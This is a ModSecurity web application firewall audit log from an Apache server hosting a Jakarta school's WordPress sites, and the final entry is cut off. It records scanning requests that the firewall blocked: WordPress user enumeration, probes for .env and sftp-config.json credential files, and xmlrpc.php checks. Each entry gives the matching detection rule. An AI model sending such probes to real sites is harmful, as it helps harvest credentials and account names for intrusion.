"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746636699330844 2740 (- - -) Stopwatch2: 1746636699330844 2740; combined=1385, p1=466, p2=889, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17361577-Z-- --fd14e853-A-- [08/May/2025:00:04:28 +0700] aBuSnIyiPdJj1JUH57qdLwAAAAk 103.236.140.4 55046 103.236.140.4 8181 --fd14e853-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.46.159.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.46.159.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fd14e853-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd14e853-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746637468719212 2273 (- - -) Stopwatch2: 1746637468719212 2273; combined=1321, p1=406, p2=884, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd14e853-Z-- --3318e320-A-- [08/May/2025:00:19:58 +0700] aBuWPoyiPdJj1JUH57qm-QAAABM 103.236.140.4 60762 103.236.140.4 8181 --3318e320-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.83.170.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.83.170.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3318e320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3318e320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746638398113480 3167 (- - -) Stopwatch2: 1746638398113480 3167; combined=2032, p1=582, p2=1422, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3318e320-Z-- --3a052c6c-A-- [08/May/2025:01:24:15 +0700] aBulT23ZWOH0zu5xiSTv-QAAANU 103.236.140.4 34636 103.236.140.4 8181 --3a052c6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --3a052c6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a052c6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746642255600217 804 (- - -) Stopwatch2: 1746642255600217 804; combined=349, p1=310, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a052c6c-Z-- --52f7b861-A-- [08/May/2025:01:57:00 +0700] aBus_G3ZWOH0zu5xiSTzagAAAMY 103.236.140.4 48680 103.236.140.4 8181 --52f7b861-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.234.48.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.234.48.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52f7b861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52f7b861-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746644220928140 3351 (- - -) Stopwatch2: 1746644220928140 3351; combined=1372, p1=476, p2=864, p3=0, p4=0, p5=31, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52f7b861-Z-- --4b522552-A-- [08/May/2025:02:01:37 +0700] aBuuEV2wLCWKKTe5QCEgGAAAAEM 103.236.140.4 48722 103.236.140.4 8181 --4b522552-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 13.38.12.190 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* Cookie: X-Forwarded-For: 13.38.12.190 Accept-Encoding: gzip X-Varnish: 143964719 --4b522552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b522552-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746644497296939 960 (- - -) Stopwatch2: 1746644497296939 960; combined=389, p1=343, p2=0, p3=0, p4=0, p5=46, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b522552-Z-- --fa29d866-A-- [08/May/2025:02:43:16 +0700] aBu31IyiPdJj1JUH57rbgwAAABA 103.236.140.4 57140 103.236.140.4 8181 --fa29d866-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 929) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 Accept-Charset: utf-8 --fa29d866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa29d866-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746646996784350 906 (- - -) Stopwatch2: 1746646996784350 906; combined=396, p1=354, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa29d866-Z-- --98879d42-A-- [08/May/2025:03:09:15 +0700] aBu9612wLCWKKTe5QCEiuwAAAFY 103.236.140.4 60520 103.236.140.4 8181 --98879d42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.58.16.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.58.16.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --98879d42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98879d42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746648555367883 2920 (- - -) Stopwatch2: 1746648555367883 2920; combined=1292, p1=464, p2=798, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98879d42-Z-- --9d43806f-A-- [08/May/2025:03:45:55 +0700] aBvGg6cs1DvJ_HgMHE_tMwAAAAs 103.236.140.4 32868 103.236.140.4 8181 --9d43806f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.93.157.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.93.157.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d43806f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d43806f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746650755110663 3464 (- - -) Stopwatch2: 1746650755110663 3464; combined=1421, p1=486, p2=906, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d43806f-Z-- --313de654-A-- [08/May/2025:04:06:11 +0700] aBvLQ6cs1DvJ_HgMHE_usAAAAAo 103.236.140.4 37112 103.236.140.4 8181 --313de654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --313de654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --313de654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746651971147026 2242 (- - -) Stopwatch2: 1746651971147026 2242; combined=1008, p1=356, p2=629, p3=0, p4=0, p5=23, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --313de654-Z-- --3f812329-A-- [08/May/2025:04:06:14 +0700] aBvLRqcs1DvJ_HgMHE_utwAAABI 103.236.140.4 37166 103.236.140.4 8181 --3f812329-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f812329-C-- demo.sayHello --3f812329-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f812329-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746651974443100 4678 (- - -) Stopwatch2: 1746651974443100 4678; combined=3588, p1=441, p2=2944, p3=30, p4=26, p5=83, sr=59, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f812329-Z-- --d80d9d39-A-- [08/May/2025:04:06:18 +0700] aBvLSqcs1DvJ_HgMHE_uwAAAAAs 103.236.140.4 37226 103.236.140.4 8181 --d80d9d39-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.155.185 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.155.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d80d9d39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d80d9d39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746651978658515 641 (- - -) Stopwatch2: 1746651978658515 641; combined=267, p1=232, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d80d9d39-Z-- --6f044375-A-- [08/May/2025:04:09:17 +0700] aBvL_acs1DvJ_HgMHE_wBgAAAA0 103.236.140.4 38376 103.236.140.4 8181 --6f044375-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f044375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f044375-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652157153508 3093 (- - -) Stopwatch2: 1746652157153508 3093; combined=1348, p1=421, p2=897, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f044375-Z-- --75142378-A-- [08/May/2025:04:09:18 +0700] aBvL_is5rYyn3jlLjjK9GwAAAMM 103.236.140.4 38378 103.236.140.4 8181 --75142378-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75142378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75142378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652158308190 2379 (- - -) Stopwatch2: 1746652158308190 2379; combined=1053, p1=354, p2=672, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75142378-Z-- --69095442-A-- [08/May/2025:04:09:23 +0700] aBvMAys5rYyn3jlLjjK9HQAAAMg 103.236.140.4 38384 103.236.140.4 8181 --69095442-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --69095442-C-- demo.sayHello --69095442-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69095442-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652163628362 5118 (- - -) Stopwatch2: 1746652163628362 5118; combined=3844, p1=441, p2=3170, p3=23, p4=26, p5=105, sr=65, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69095442-Z-- --daa2ef16-A-- [08/May/2025:04:09:23 +0700] aBvMA6cs1DvJ_HgMHE_wCAAAABA 103.236.140.4 38386 103.236.140.4 8181 --daa2ef16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --daa2ef16-C-- demo.sayHello --daa2ef16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa2ef16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652163921504 4808 (- - -) Stopwatch2: 1746652163921504 4808; combined=3685, p1=421, p2=3057, p3=21, p4=23, p5=94, sr=69, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa2ef16-Z-- --05c5f858-A-- [08/May/2025:04:09:25 +0700] aBvMBSs5rYyn3jlLjjK9HgAAAMY 103.236.140.4 38390 103.236.140.4 8181 --05c5f858-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --05c5f858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c5f858-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652165716738 2263 (- - -) Stopwatch2: 1746652165716738 2263; combined=1075, p1=326, p2=718, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c5f858-Z-- --93f8995b-A-- [08/May/2025:04:09:30 +0700] aBvMCis5rYyn3jlLjjK9IQAAAM8 103.236.140.4 38396 103.236.140.4 8181 --93f8995b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93f8995b-C-- demo.sayHello --93f8995b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93f8995b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652170667676 4651 